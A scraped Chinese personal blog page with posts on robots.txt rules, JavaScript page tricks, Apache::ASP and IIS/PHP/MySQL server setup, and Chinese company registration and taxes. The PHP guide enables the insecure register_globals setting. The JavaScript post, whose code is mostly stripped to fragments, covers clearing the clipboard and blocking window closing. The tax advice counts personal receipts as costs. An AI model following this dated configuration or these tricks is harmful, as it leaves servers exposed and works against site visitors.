例 5.一个简单例子 在这个例子中,该网站有三个目录对搜索引擎的访问做了限制,即搜索引擎不会访问这三个目录。 需要注意的是对每一个目录必须分开声 明,而不要写成 "Disallow: /cgi-bin/ /tmp/"。 User-agent:后的*具有特殊的含义,代表"any robot",所以在该文件中不能有"Disallow: /tmp/*" or "Disallow:*.gif"这样的记录出现。 User-agent: *Disallow: /cgi-bin/Disallow: /tmp/Disallow: /~joe/
Robot特殊参数:
1. Google
允许 Googlebot:
如果您要拦截除 Googlebot 以外的所有漫游器访问您的网页,可以使用下列语法:
User-agent:Disallow:/
User-agent:Googlebot
Disallow:
Googlebot 跟随指向它自己的行,而不是指向所有漫游器的行。
"Allow"扩展名:
Googlebot 可识别称为"Allow"的 robots.txt 标准扩展名。其他搜索引擎的漫游器可能无法识别此扩展名,因此请使用您感兴趣的其他搜索引擎进行查找。"Allow"行的作用原理完全与 "Disallow"行一样。只需列出您要允许的目录或页面即可。
您也可以同时使用"Disallow"和"Allow"。例如,要拦截子目录中某个页面之外的其他所有页面,可以使用下列条目:
User-Agent:Googlebot
Disallow:/folder1/
Allow:/folder1/myfile.html
这些条目将拦截 folder1 目录内除 myfile.html 之外的所有页面。
如果您要拦截 Googlebot 并允许 Google 的另一个漫游器(如 Googlebot-Mobile),可使用"Allow"规则允许该漫游器的访问。例如:
User-agent:Googlebot
Disallow:/
User-agent:Googlebot-Mobile
Allow:
使用 * 号匹配字符序列:
您可使用星号 (*) 来匹配字符序列。例如,要拦截对所有以 private 开头的子目录的访问,可使用下列条目:
User-Agent:Googlebot
Disallow:/private*/
要拦截对所有包含问号 (?) 的网址的访问,可使用下列条目:
User-agent:*
Disallow:/*?*
使用 $ 匹配网址的结束字符
您可使用 $ 字符指定与网址的结束字符进行匹配。例如,要拦截以 .asp 结尾的网址,可使用下列条目:
User-Agent:Googlebot
Disallow:/*.asp$
您可将此模式匹配与 Allow 指令配合使用。例如,如果 ? 表示一个会话 ID,您可排除所有包含该 ID 的网址,确保 Googlebot 不会抓取重复的网页。但是,以 ? 结尾的网址可能是您要包含的网页版本。在此情况下,可对 robots.txt 文件进行如下设置:
User-agent:*
Allow:/*?$
Disallow:/*?
Disallow:/ *?一行将拦截包含 ? 的网址(具体而言,它将拦截所有以您的域名开头、后接任意字符串,然后是问号 (?),而后又是任意字符串的网址)。
Allow: /*?$ 一行将允许包含任何以 ? 结尾的网址(具体而言,它将允许包含所有以您的域名开头、后接任意字符串,然后是问号 (?),问号之后没有任何字符的网址)。
Sitemap 网站地图:
对网站地图的新的支持方式,就是在robots.txt文件里直接包括sitemap文件的链接。
就像这样:
Sitemap: http://www.eastsem.com/sitemap.xml
目前对此表示支持的搜索引擎公司有Google, Yahoo, Ask and MSN。
不过,我建议还是在Google Sitemap 进行提交,里面有很多功能可以分析你的链接状态。
Robots.txt带来的好处:
1. 几乎所有的搜索引擎Spider都遵循robots.txt给出的爬行规则,协议规定搜索引擎Spider进入某个网站的入口即是该网站的 robots.txt,当然,前提是该网站存在此文件。对于没有配置robots.txt的网站,Spider将会被重定向至404 错误页面,相关研究表明,如果网站采用了自定义的404错误页面,那么Spider将会把其视作robots.txt——虽然其并非一个纯粹的文本文件 ——这将给Spider索引网站带来很大的困扰,影响搜索引擎对网站页面的收录。
2. robots.txt可以制止不必要的搜索引擎占用服务器的宝贵带宽,如email retrievers,这类搜索引擎对大多数网站是没有意义的;再如image strippers,对于大多数非图形类网站来说其也没有太大意义,但却耗用大量带宽。
3. robots.txt可以制止搜索引擎对非公开页面的爬行与索引,如网站的后台程序、管理程序,事实上,对于某些在运行中产生临时页面的网站来说,如果未配置robots.txt,搜索引擎甚至会索引那些临时文件。
4. 对于内容丰富、存在很多页面的网站来说,配置robots.txt的意义更为重大,因为很多时候其会遭遇到搜索引擎Spider给予网站的巨大压力:洪水般的Spider访问,如果不加控制,甚至会影响网站的正常访问。
5. 同样地,如果网站内存在重复内容,使用robots.txt限制部分页面不被搜索引擎索引和收录,可以避免网站受到搜索引擎关于 duplicate content的惩罚,保证网站的排名不受影响。
robots.txt带来的风险及解决:
1. 凡事有利必有弊,robots.txt同时也带来了一定的风险:其也给攻击者指明了网站的目录结构和私密数据所在的位置。虽然在Web服务器的安全措施配置得当的前提下这不是一个严重的问题,但毕竟降低了那些不怀好意者的攻击难度。
比如说,如果网站中的私密数据通过www.yourdomain.com/private/index.html 访问,那么,在robots.txt的设置可能如下:
User-agent: *
Disallow: /private/
这样,攻击者只需看一下robots.txt即可知你要隐藏的内容在哪里,在浏览器中输入www.yourdomain.com/private/ 便可访问我们不欲公开的内容。对这种情况,一般采取如下的办法:
设置访问权限,对/private/中的内容实施密码保护,这样,攻击者便无从进入。
另一种办法是将缺省的目录主文件index.html更名为其他,比如说abc-protect.html,这样,该内容的地址即变成 www.yourdomain.com/private/abc-protect.htm,同时,制作一个新的index.html文件,内容大致为"你 没有权限访问此页"之类,这样,攻击者因不知实际的文件名而无法访问私密内容。
2. 如果设置不对,将导致搜索引擎将索引的数据全部删除。
User-agent: *
Disallow: /
上述代码将禁止所有的搜索引擎索引数据。
目前看来,绝大多数的搜索引擎机器人都遵守robots.txt的规则,而对于Robots META标签,目前支持的并不多,但是正在逐渐增加,如着名搜索引擎GOOGLE就完全支持,而且GOOGLE还增加了一个指令"archive",可以 限制GOOGLE是否保留网页快照。例如:
<META NAME="googlebot" CONTENT="index,follow,noarchive">
表示抓取该站点中页面并沿着页面中链接抓取,但是不在GOOLGE上保留该页面的网页快照。
我的QQ空间
共享一下:在网页中常用的JavaScript代码
在网页中常用的JavaScript代码! 1>屏蔽功能类1.1 屏蔽键盘所...
2009年6月18日星期四
共享一下:在网页中常用的JavaScript代码
在网页中常用的JavaScript代码! 1>屏蔽功能类 1.1 屏蔽键盘所有键 1.2 屏蔽鼠标右键 在body标签里加上oncontextmenu=self.event.returnvalue=false 或者 <script language="javascript"> function nocontextmenu() 或者 <body onmousedown="rclick()" oncontextmenu= "nocontextmenu()"> <script language="javascript">
<script language="javascript"> /* 注:这还不是真正地屏蔽 Alt+ 方向键, if ((event.keyCode == 8) && 1.4屏蔽浏览器右上角"最小化""最大化""关闭"键 <script language=javascript> 或者使用全屏打开页面 <script language="javascript"> 注:在body标签里加上onbeforeunload="javascript:return false"(使不能关闭窗口) 1.5屏蔽F5键 <script language="javascript"> 1.6屏蔽IE后退按钮 在你链接的时候用 <a href="javascript:location.replace(url)"> 1.7屏蔽主窗口滚动条 在body标签里加上 style="overflow-y:hidden" 1.8 屏蔽拷屏,不断地清空剪贴板 在body标签里加上onload="setInterval('clipboardData.setData(\'Text\',\'\')',100)" 1.9 屏蔽网站的打印功能 <style> 1.10 屏蔽IE6.0 图片上自动出现的保存图标 方法一: 1.11 屏蔽页中所有的script <noscrript></noscript> 2>表单提交验证类
2.1 表单项不能为空 <script language="javascript"> 2.2 比较两个表单项的值是否相同 <script language="javascript"> 2.3 表单项只能为数字和"_",用于电话/银行帐号验证上,可扩展到域名注册等 <script language="javascript">
<script language="javascript"> 2.5 中文/英文/数字/邮件地址合法性判断 <SCRIPT LANGUAGE="javascript"> function isEnglish(name) //英文值检测 function isChinese(name) //中文值检测 function isMail(name) // E-mail值检测 function isNumber(name) //数值检测 function CheckForm() 2.6 限定表单项不能输入的字符 <script language="javascript"> function contain(str,charset)// 字符串包含测试函数 function CheckForm() 我的QQ空间 在unix上让apache支持asp 让php服务器支持ASP 找了好久,,终于找到了好东西...现今,,共享出来,,在这里讨论这个... |
2009年6月17日星期三
在unix上让apache支持asp 让php服务器支持ASP
| 找了好久,,终于找到了好东西...现今,,共享出来,, 在这里讨论这个问题,仅是为了研究,我个人认为,在unix上,让apache支持asp没有任何实际意义 如果以前是在win上开发的asp,我想你就让到在win上好好用吧,不用费劲的移植到unix上了 我是在solaris上测试的安装,其它系统,freebsd,linux和sco我想也差不多,忘大家测时候能反馈给我你的结果,谢谢 好了,让我们开始吧 下载相关软件 apache_1.3.27.tar 下载:http://www.apache.org/dist Apache-ASP-2.49.tar 下载:http://cpan.org/modules/by-module/Apache/ mod_perl-1.27.tar 下载:http://perl.apache.org/download/index.html stable.tar(perl-5.8.0) 下载:http://www.cpan.org/src/ 把上面的软件下载到一个目录,如test 1:解压 #tar xvf apache_1.3.27.tar #tar xvf Apache-ASP-2.49.tar #tar xvf mod_perl-1.27.tar 2:安装apache 为了以DSO的方式安装mod_perl,所以要有so模块 #cd apache_1.3.27 #./configure --prefix=/usr/local/apache #make #make install 上面这样编译会有一些modules加不进来,我只好手动指定modules了,大家用下面的命令安装apache #./configure --prefix=/usr/local/apache --enable-module=auth_anon --enable-module=auth_dbm --enable-module=autoindex - -enable-module=cgi --enable-module=expires --enable-module=expires --enable-module=proxy --enable-module=rewrite - -enable-module=so #make #make install 检查安装的模块 #cd /usr/local/apache/bin/httpd -l Compiled-in modules: http_core.c mod_env.c mod_log_config.c mod_mime.c mod_negotiation.c mod_status.c mod_include.c mod_autoindex.c mod_dir.c mod_cgi.c mod_asis.c mod_imap.c mod_actions.c mod_userdir.c mod_alias.c mod_rewrite.c mod_access.c mod_auth.c mod_auth_anon.c mod_auth_dbm.c mod_proxy.c mod_expires.c mod_so.c mod_setenvif.c suexec: disabled; invalid wrapper /usr/local/apache/bin/suexe 3:安装mod_perl % make -v % gcc -v % perl -v 安装perl 我得perl版本不够,所以我升级了一下perl的版本,现在是v5.8.0 下载http://www.cpan.org/src/stable.tar #tar xvf stable.tar #cd perl-5.8.0/ #make #make install 到sunfreeware下载pkg的安装也可以,可能还更简单 #cd mod_perl-1.27 看看DSO编译的语法 #grep DSO Makefile.PL 照猫画虎 #perl Makefile.PL EVERYTHING=1 DO_HTTPD=1 USE_APACI=1 USE_DSO=1 USE_APXS=1 WITH_APXS=/usr/local/apache/bin/apxs #make #make install 测试mod_perl模块 启动apache #telnet localhost 80 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 输入get Head /http /1.0 HTTP/1.1 400 Bad Request Date: Wed, 25 Dec 2002 03:32:32 GMT Server: Apache/1.3.27 (Unix) mod_perl/1.27 ok,mod_perl加上了 给perl安装asp模块,一张方法是CPAN安装,一种是常规安装 CPAN安装 #perl -MCPAN -e shell cpan>; install CPAN ... Installing the Apache::ASP bundle will automatically install all the modules Apache::ASP is dependent on as well as Apache::ASP itself. If you have trouble installing the bundle, then try installing the necessary modules one at a time: cpan>; install MLDBM cpan>; install MLDBM::Sync cpan>; install Digest::MD5 cpan>; install Apache::ASP For extra/optional functionality in Apache::ASP 2.31 or greater, like support for FormFill, XSLT, or SSI, you can install this bundle via CPAN: cpan>; install Bundle::Apache::ASP::Extra 也可以用常规的方法安装asp模块 Otherwise, just copy ASP.pm to $PERLLIB/site/Apache >; perl Makefile.PL >; make >; make test >; make install 安装完毕,进行测试 在htdocs里vi一个test.asp,内容如下 <!-- sample here -->; <html>; <body>; For loop incrementing font size: <p>; <% for(1..5) { %>; <!-- iterated html text -->; <font size="<%=$_%>;" >; Size = <%=$_%>; </font>; <br>; <% } %>; </body>; </html>; <!-- end sample here -->; http://202.106.185.101/test.asp 大家可以到这里看看效果 good luck! 参考文档 http://www.apache-asp.org/install.html http://cpan.org/modules/by-module/Apache/Apache-ASP-2.49.readme http://perl.apache.org/docs/1.0/guide/getwet.html#Installing_mod_perl http://www.freelamp.com/new/publish/1015481268/index_html 答谢: 我的QQ空间 win2003+asp+php+mysql+zend+phpmyadmin服务器配置 一、软件准备1、windos20032、IIS6.03、php-5.0.4-Win324、mysql... |
win2003+asp+php+mysql+zend+phpmyadmin服务器配置
| 一、软件准备 1、windos2003 2、IIS6.0 3、php-5.0.4-Win32 4、mysql-5.1.6-alpha-win32 5、ZendOptimizer-2.6.0-Windows-i386 6、phpMyAdmin-2.7.0-pl2 二、开始安装 请确认已经安装好了windos2003+IIS6.0 第一步:安装PHP 1、将下载得到的php-5.0.4-Win32解压移动到自己需要放置的目录; 2、将PHP目录下和 php/ext 目录下的所有.dll文件复制到 WINDOWS\system32 目录里; 3、将PHP目录下的php.exe、php-win.exe和php.ini-dist三个文件拷到C:\Windows目录下; 4、将C:\Windows\php.ini-dist改名为php.ini,然后用记事本打开, (1)利用记事本的查找功能搜索 register_globals = Off 将 Off 改成 On ; (2)再搜索 extension_dir = 并将其路径指到你的 PHP 目录下的 ext 目录,比如:extension_dir = "C:\Inetpub\php\ext" (3)搜索找到 ;Windows Extensions 将下面列举的 ;extension=php_dbase.dll ;extension=php_gd2.dll (这是用来支持GD库的) ;extension=php_ldap.dll ;extension=php_mbstring.dll (这不选一般用PHPMYADMIN会出红色提示,故必选) ;extension=php_mssql.dll (这个是用来支持MSSQL的,可选) ;extension=php_mysql.dll (这个是用来支持MYSQL的,要支持MYSQL必选) 将这些前的";"去掉,其他的你需要的也可以去掉前面的;然后关闭保存该文件。 5、配置 IIS 使其支持 PHP: 打开 IIS 后停止服务,然后在左侧默认Web站点上单击右键选择"属性", 在打开的" Web 站点属性"窗口的"ISAPI 筛选器"标签里找到并点击"添加"按钮, 在弹出的"筛选器属性"窗口中的"筛选器名称"栏中输入:PHP ,再将可执行文件指向 php5isapi.dll 所在路径,如:C:\Inetpub\php\php5isapi.dll 。  打开"Web 站点属性"窗口的"主目录"标签,找到并点击"配置"按钮, 在弹出的"应用程序配置"窗口中找到并点击"添加"按钮, 在弹出的窗口中新增一个扩展名映射,扩展名为 .php ,单击"浏览"将可执行文件指向 php5isapi.dll 所在路径,如:C:\Inetpub\php\php5isapi.dll,然后一路确定即可。  再打开"Web 站点属性"窗口的"文档"标签,找到并点击"添加"按钮,向默认的 Web 站点启动文档列表中添加 index.php 项。 您可以将 index.php 升到最高优先级,这样,访问站点时就会首先自动寻找并打开 index.php 文档。  确定 Web 目录的应用程序设置和执行许可中选择为"纯脚本",然后关闭 Internet 信息服务管理器, 在命令提示符中执行如下命令: net stop w3svc net stop iisadmin net start w3svc 然后在"Internet 服务管理器"左边的"WEB服务扩展"中设置 ISAPI 扩展 允许, Active Server Pages 允许。  在 IIS 根目录下新建一个 phpinfo.php ,命名为:index.php 内容如下: <?php phpinfo(); ?> 打开浏览器,输入:http://localhost/, 将显示当前服务器所支持 PHP 的全部信息。  第二步:安装 MySQL 将下载得到的 mysql-5.1.6-alpha-win32 直接双击安装即可(注意安装目录不要太深,路径中不要出现空格)。 安装过程中会提示你是不是立即进行配置,选择否即可完成安装。 安装完毕后,在"开始"菜单里面有配置向导MySQL Server Instance Config Wizar, 运行后按下面步骤配置设置ROOT密码即可   ROOT密码,建议社设置复杂点,确保服务器安全!  第三步:安装 Zend Optimizer 将下载后得到 ZendOptimizer-2.6.0-Windows-i386 直接双击安装即可, 安装过程要你选择 Web Server 时,选择 IIS ,然后提示你是否 Restart Web Server,选择是,完成安装之前提示是否备份 php.ini ,点确定后安装完成。 Zend Optimizer 的安装向导会自动根据你的选择来修改 php.ini 帮助你启动这个引擎。 打开 php.ini 搜索: zend_optimizer.optimization_level=15 优化程度,这里定义启动多少个优化过程,默认值是 15 , 表示同时开启 10 个优化过程中的 1-4 ,我们可以将这个值改为 1023,表示开启全部10个优化过程。 第四步:安装GD库 这一步在前面PHP.INI配置中实际上已经安装好了, 在php.ini里找到 "extension_dir",然后将路径指向extension,如下(假设你的php安装路 径为:C:\Inetpub\php,设置extension_dir = "C:\Inetpub\php\ext",完成这步后, 在 php.ini 里找到 "extension=php_gd2.dll" 这一行,并且去掉前面的分号,gd库安装完成。 第五步:安装 phpMyAdmin 将下载得到的 phpMyAdmin-2.7.0-pl2 ,解压到 IIS 默认网站根目录, 找到并打开 config.default.php,做以下修改: 1、搜索 $cfg['PmaAbsoluteUri'] ,设置你的phpmyadmin的URL, 如: $cfg['PmaAbsoluteUri'] = 'http://localhost/phpmyadmin/'; 注意这里假设phpmyadmin在默认站点的根目录下 2、搜索$cfg['blowfish_secret'],设定好root密码后这里也要填写mysql设置时的密码 3、搜索 $cfg['DefaultLang'] ,将其设置为 zh-gb2312 4、搜索 $cfg['DefaultCharset'] ,将其设置为 gb2312 5、搜索 $cfg['Servers'][$i]['auth_type'] ,默认为config,是不安全的,不推荐,推荐使用cookie, 将其设置为 $cfg['Servers'][$i]['auth_type'] = 'cookie'; 打开浏览器,输入:http://localhost/phpMyAdmin/ ,若 IIS 和 MySQL 均已启动,输入用户ROOT密码即可浏览数据库内容。 来源于:www.ttlook.net 转载请注明出处。 我的QQ空间 幸福接力棒(被娃点名了) 幸福接力棒(被点名了) 幸福接力棒--被木屋点到了 Q1: ... |
公司或工作室的工商注册程序
| 毕业生一定要注册查看一下自己是否是二年以后的毕业生..很多地方有优惠的. 个体经营优惠更多. 有限公司优惠可能比较少..个人公司不知道怎么算.呵.这几天也在打听看有没有啥优惠的! 你有二种选择,即注册为工作室性质,和注册公司性质。注册为工作室或公司,均不影响业务种类,都可以从事你所说的提供网络服务。规模小的话,可以先注册为工作室,规模大的话可以注册为公司,公司的形象更好一些,利于业务的开展。工作室的成本低、管理费用少、管理简单,公司注册手续麻烦,成本高、管理费用高、管理麻烦。 工作室一般属于个体户或个人独资企业,不是公司形式,名称形式可以是"福州市鼓楼区XX网络工作室",名称中不能有"公司"字样。 个体户不是企业,个人独资企业虽然是企业,但要承担无限责任,也就是说的生意,不仅要用工作室的投资承担责任,还要用你的全部个人财产来承担。 网络公司则属于"有限责任公司"形式,名称中有"有限公司"或"有限责任公司"字样,例如"马尾二零零八科技有限公司"。公司承担有限责任,以投资人的出资额承担有限责任,例如投资只有10万元,就以这10万元承担有限责任。 个体户、个人独资企业没有注册资金的限制,公司要求最低注册资金3万元,要求2个或2个以上股东,如果只有1个股东,则要求最低注册资金10万元。 对网络公司而言,如果开展网页制作、网络信息服务,则需要办理ICP经营许可证,办理此证的一个前提条件是公司的注册资本在100万元上。因此,你办理网络公司,注册资金最少要100万元。 如果你没有那么多注册资金,可以请专门的工商代理公司帮你注册,他们可以出资帮你垫作注册资金,这不是弄虚做假,而一种借贷关系,相当于是借钱给你做为注册资金。100万元的公司,请代理公司注册下来全部费用大概在5000-1万元。 下面以有限公司为例,介绍一下注册手续: ===================================================== 要注册一个公司,首先想好经营什么,怎样经营好,再来注册。要不,注册了也没有用,注册了公司是需要很多成本的,不是一件"好玩"的事情。 前期可行性分析调查,建议你自己认真的考虑一下。接下来谈谈如何注册公司,需要哪些手续、怎样操作。 一、选择公司的形式: 普通的有限责任公司,最低注册资金3万元,需要2个(或以上)股东, 从06年1月起新的公司法规定,允许1个股东注册有限责任公司,这种特殊的有限责任公司又称"一人有限公司"(但公司名称中不会有"一人"字样,执照上会注明"自然人独资"),最低注册资金10万元。 如果你和朋友、家人合伙投资创业,可选择普通的有限公司,最低注册资金3万元;如果只有你一个人作为股东,则选择一人有限公司,最低注册资金10万元。 二、注册公司的步骤: 1.核名:到工商局去领取一张"企业(字号)名称预先核准申请表",填写你准备取的公司名称,由工商局上网(工商局内部网)检索是否有重名,如果没有重名,就可以使用这个名称,就会核发一张"企业(字号)名称预先核准通知书"。这一步的手续费是30元。 (30元可以帮你检索5个名字,很多名字重复,所以一般常见的名字就不用试了,免得花冤枉钱) 2.租房: 去专门的写字楼租一间办公室,如果你自己有厂房或者办公室也可以,有的地方不允许在居民楼里办公。 租房后要签订租房合同,并让房东提供房产证的复印件。 签订好租房合同后,还要到税务局去买印花税,按年租金的千分之一的税率购买,例如你的每年房租是1万元,那就要买10元钱的印花税,贴在房租合同的首页,后面凡是需要用到房租合同的地方,都需要是贴了印花税的合同复印件。 3.编写"公司章程": 可以在工商局网站下载"公司章程"的样本,修改一下就可以了。章程的最后由所有股东签名。 4.刻私章: 去街上刻章的地方刻一个私章,给他们讲刻法人私章(方形的)。费用大概20元左右。 5.到会计师事务所领取"银行询征函":: 联系一家会计师事务所,领取一张"银行询征函"(必须是原件,会计师事务所盖鲜章)。如果你不清楚,可以看报纸上的分类广告,有很多会计师事务所的广告。 6.去银行开立公司验资户: 所有股东带上自己入股的那一部分钱到银行,带上公司章程、工商局发的核名通知、法人代表的私章、身份证、用于验资的钱、空白询征函表格,到银行去开立公司帐户,你要告诉银行是开验资户。开立好公司帐户后,各个股东按自己出资额向公司帐户中存入相应的钱。 银行会发给每个股东缴款单、并在询征函上盖银行的章。 注意:公司法规定,注册公司时,投资人(股东)必须缴纳足额的资本,可以以贷币形式(也就是人民币)出资,也可以以实物(如汽车)、房产、知识产权等出资。到银行办的只是货币出资这一部分,如果你有实物、房产等作为出资的,需要到会计师事务所鉴定其价值后再以其实际价值出资,比较麻烦,因此建议你直接拿钱来出资,公司法不管你用什么手段拿的钱,自己的也好、借的也好,只要如数缴足出资款即可。 7.办理验资报告: 拿着银行出具的股东缴款单、银行盖章后的询征函,以及公司章程、核名通知、房租合同、房产证复印件,到会计师事务所办理验资报告。一般费用500元左右(50万以下注册资金)。 8.注册公司: 到工商局领取公司设立登记的各种表格,包括设立登记申请表、股东(发起人)名单、董事经理监理情况、法人代表登记表、指定代表或委托代理人登记表。填好后,连同核名通知、公司章程、房租合同、房产证复印件、验资报告一起交给工商局。大概3个工作日后可领取执照。 此项费用约300元左右。 9.凭营业执照,到公安局指定的刻章社,去刻公章、财务章。后面步骤中,均需要用到公章或财务章。 10.办理企业组织机构代码证: 凭营业执照到技术监督局办理组织机构代码证,费用是80元。办这个证需要半个月,技术监督局会首先发一个预先受理代码证明文件,凭这个文件就可以办理后面的税务登记证、银行基本户开户手续了。 11.去银行开基本户: 凭营业执照、组织机构代码证,去银行开立基本帐号。最好是在原来办理验资时的那个银行的同一网点去办理,否则,会多收100元的验资帐户费用。 开基本户需要填很多表,你最好把能带齐的东西全部带上,要不然要跑很多趟,包括营业执照正本原件、身份证、组织机构代码证、公财章、法人章。 开基本户时,还需要购买一个密码器(从2005年下半年起,大多银行都有这个规定),密码器需要280元。今后你的公司开支票、划款时,都需要使用密码器来生成密码。 12.办理税务登记: 领取执照后,30日内到当地税务局申请领取税务登记证。一般的公司都需要办理2种税务登记证,即国税和地税。费用是各40元,共80元。 办理税务登记证时,必须有一个会计,因为税务局要求提交的资料其中有一项是会计资格证和身份证。你可先请一个兼职会计,小公司刚开始请的兼职会计一般200元工资就可以了。 13.申请领购发票: 如果你的公司是销售商品的,应该到国税去申请发票,如果是服务性质的公司,则到地税申领发票。 最后就开始营业了。 注意每个月按时向税务申报税哦,即使没有开展业务不需要缴税,也要进行零申报,否则会被罚款的。 有二点你可能比较关心: 1.公司必须建立健全的会计制度,你可能担心自己不会,怎么办?刚开始成立的公司,业务少,对会计的工作量也非常小,你可以请一个兼职会计,每个月到你的公司帮你建帐,二、三天时间就够了,给他200-500左右的工资即可。 2.公司的税额: 营业税:销售商品的公司,按所开发票额的4%征收增殖税;提供服务的公司,按所开发票额的5%征收营业税。 所得税:对企业的纯利润征收18-33%的企业所得税。 小公司的利润不多,一般是18%。对企业所得税,做帐很关键,如果帐面上你的利润很多,那税率就高。所以,平常的购买设备都要开发票,你吃饭、坐车的票都留起来,可以做为你的企业运作成本。 二种税的区别:营业税是对营业额征税,不管你赚没有赚钱,只有发生了交易,开了发票,就要征税;所得税,是对利润征税,利润就是营业额扣减各种成本后剩余的钱,只有赚了钱,才会征所得税。 还有其它各种各样很多种的税,但没有多少钱,主要是上面二种,特别是所得税非常高。 我的QQ空间 幸福接力棒(被娃点名了) 幸福接力棒(被点名了) 幸福接力棒--被木屋点到了 Q1: ... |